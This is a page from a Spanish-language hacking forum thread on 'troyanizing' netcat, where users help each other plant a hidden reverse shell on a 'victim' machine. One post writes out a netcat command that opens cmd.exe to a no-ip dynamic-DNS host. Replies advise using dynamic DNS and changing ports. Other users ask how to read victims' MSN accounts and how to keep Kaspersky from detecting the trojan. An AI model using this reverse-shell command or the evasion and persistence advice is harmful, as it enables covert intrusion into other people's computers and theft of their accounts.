elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Jugando con netcat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 ... 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 [39] 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 ... 65 Ir Abajo Respuesta Imprimir
Autor Tema: Jugando con netcat  (Leído 358,197 veces)
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Jugando con netcat
« Respuesta #380 en: 28 Enero 2008, 20:15 pm »

Citar
hola que tal, exelentemente explicado, pero tengo un problema, en el equipo victima todo bien me da un pantallaso de la consola y crea el archivo en la carpeta update. Pero a la hora de abrir la consola y escrbibir "nc -vv -L -p 80" no hace nada, dice escuchando puerto y queda asi para siempre

Lo estas haciendo con conexion inversa?? Porque si es así el nc de la víctima ha intentado conectarse a tu pc y resulta ser que tu te has puesto a la escucha luego de esto, cuando el nc de la victima intentó conectarse no había nadie del otro lado  :P

Saludos

[Edito]: vitaepe, piensa que la mayoría de las personas utilizan windows, si lo que quieres son los comandos de linux simplemente teclea nc -h en Ubuntu para ver la ayuda, verás que son prácticamente iguales
« Última modificación: 28 Enero 2008, 21:46 pm por Novlucker » En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
darkirax

Desconectado Desconectado

Mensajes: 59


Ver Perfil
Re: Jugando con netcat
« Respuesta #381 en: 5 Febrero 2008, 14:12 pm »

hola me e leido el tutorial pero me surgio una duda

yo tengo ip dinamica osea k despues de configurar el netcat k le voy a enviar i todo cuando me canvie la ip ya no voy a tener conexion como podria solucionar eso??
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Jugando con netcat
« Respuesta #382 en: 5 Febrero 2008, 19:57 pm »

Si tienes ip dinámica create una cuenta en no-ip y ya no tendrás ningún tipo de problemas

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
darkirax

Desconectado Desconectado

Mensajes: 59


Ver Perfil
Re: Jugando con netcat
« Respuesta #383 en: 5 Febrero 2008, 21:54 pm »

ola gracias por la respuesta ya me e creado una cuenta en no-ip pero me pueden decir k hace exactamente i como lu utilizo para k no me canvia la ip?


gracias
En línea

¹4¹²

Desconectado Desconectado

Mensajes: 49



Ver Perfil
Re: Jugando con netcat
« Respuesta #384 en: 5 Febrero 2008, 22:42 pm »

Alguien podria poner comados para el manual 1 (troyanizando netcat) para ver las cuentas de msn? Q otros comandos se pueden usar?Cuales son?
SAlu2
En línea

...El Ladrón es un artista creativo capaz de crear robos asombrosos, mientras que el Detective se dedica a reconstruir su trabajo; lo que lo convierte en un mero crítico...
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Jugando con netcat
« Respuesta #385 en: 5 Febrero 2008, 22:50 pm »

ola gracias por la respuesta ya me e creado una cuenta en no-ip pero me pueden decir k hace exactamente i como lu utilizo para k no me canvia la ip?

gracias

Aquí tienes la explicación - MANUAL NO-IP

Saludos
« Última modificación: 5 Febrero 2008, 23:12 pm por Novlucker » En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
darkirax

Desconectado Desconectado

Mensajes: 59


Ver Perfil
Re: Jugando con netcat
« Respuesta #386 en: 6 Febrero 2008, 13:59 pm »

gracias por el manual ;D
En línea

darkirax

Desconectado Desconectado

Mensajes: 59


Ver Perfil
Re: Jugando con netcat
« Respuesta #387 en: 6 Febrero 2008, 19:57 pm »

hola
tengo un pekenyo problemillacon el netcat e creado una cuenta no-ip i e creado el host
en mi ordenador abro el no ip i le doy el clic en el host luego en otro ordenador k tengo en mi casa le pongo el netcat -d -e cmd.exe darkirax.no-ip.org 80 i en mi pc le pongo en escucha al puerto 80 pero no ocurre nada... k ago mal?

si en vez de poner el host del mi ip pongo mi ip interna si k anda pero esto no me servira para gente k no este en mi red

espero respuesta

gracias
En línea

Straust

Desconectado Desconectado

Mensajes: 13


shalom


Ver Perfil
Re: Jugando con netcat
« Respuesta #388 en: 12 Febrero 2008, 12:54 pm »

Ehholas, ahi disculpan si el comentario esta repetido pero es que es muy largo y necesito publicar esto rapido:
el problemita es que esta semana ensayando lo de troyanizar el NetCat con un amigo y resulta que el tiene el antivirus karspersky y ese antivirus me detecta el NetCa como un rootshell, entonces como hago para que no lo detecte??

salu2!!
grax
En línea

Dificil es la vida de aquel que no conoce el motivo de su existencia
K-19


Desconectado Desconectado

Mensajes: 422


Sarah Wayne


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #389 en: 14 Febrero 2008, 20:20 pm »

hola
tengo un pekenyo problemillacon el netcat e creado una cuenta no-ip i e creado el host
en mi ordenador abro el no ip i le doy el clic en el host luego en otro ordenador k tengo en mi casa le pongo el netcat -d -e cmd.exe darkirax.no-ip.org 80 i en mi pc le pongo en escucha al puerto 80 pero no ocurre nada... k hago mal?

si en vez de poner el host del mi ip pongo mi ip interna si k anda pero esto no me servira para gente k no este en mi red

espero respuesta

gracias


Prueba a usar otro puerto que no sea el 80, el puerto 80 es usado por los navegadores y para protocolo http, asi que molestate en usar otro puerto, esto esta muy tratado ya, usa uno del tipo 2000 o asi.
En línea

Páginas: 1 ... 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 [39] 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 ... 65 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines